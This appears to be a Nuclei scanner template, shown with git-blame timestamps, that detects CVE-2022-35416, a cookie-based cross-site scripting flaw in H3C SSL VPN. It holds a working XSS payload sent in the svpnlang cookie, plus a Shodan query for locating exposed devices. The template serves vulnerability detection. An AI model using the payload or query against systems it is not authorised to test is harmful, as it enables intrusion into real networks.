2022-07-14 10:44:12 +00:00
|
|
|
id: CVE-2022-35416
|
|
|
|
|
|
|
|
info:
|
2022-09-16 19:50:10 +00:00
|
|
|
name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting
|
2022-07-14 10:44:12 +00:00
|
|
|
author: 0x240x23elu
|
2022-09-16 20:03:07 +00:00
|
|
|
severity: medium
|
2022-07-14 10:44:12 +00:00
|
|
|
description: |
|
2022-09-16 19:50:10 +00:00
|
|
|
H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability.
|
2022-07-14 10:44:12 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/advisories/GHSA-9x76-78gc-r3m9
|
|
|
|
- https://github.com/Docker-droid/H3C_SSL_VPN_XSS
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-35416
|
2022-07-16 12:45:45 +00:00
|
|
|
classification:
|
2022-09-16 20:03:07 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
2022-09-16 19:50:10 +00:00
|
|
|
cve-id: CVE-2022-35416
|
2022-09-16 20:03:07 +00:00
|
|
|
cwe-id: CWE-79
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.00099
|
2023-11-14 05:56:48 +00:00
|
|
|
epss-percentile: 0.40833
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:*
|
2022-07-14 10:44:12 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: h3c
|
|
|
|
product: ssl_vpn
|
2023-09-06 11:59:08 +00:00
|
|
|
shodan-query: http.html_hash:510586239
|
2022-07-14 10:44:12 +00:00
|
|
|
tags: cve,cve2022,xss,vpn,h3c
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-14 10:44:12 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /wnm/login/login.json HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Cookie: svpnlang=<script>alert('document.domain')</script>
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "<script>alert('document.domain')</script>"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-11-14 10:20:39 +00:00
|
|
|
# digest: 490a004630440220652156589dd73291c87c7afa9c09a69ea2ab15af243026dc64deca1811a4671902205e46d5c2de618b9aff14b70e9b6aa577f251fdb2d8c71013659633a419ae3e0a:922c64590222798bb761d5b6d8e72950
|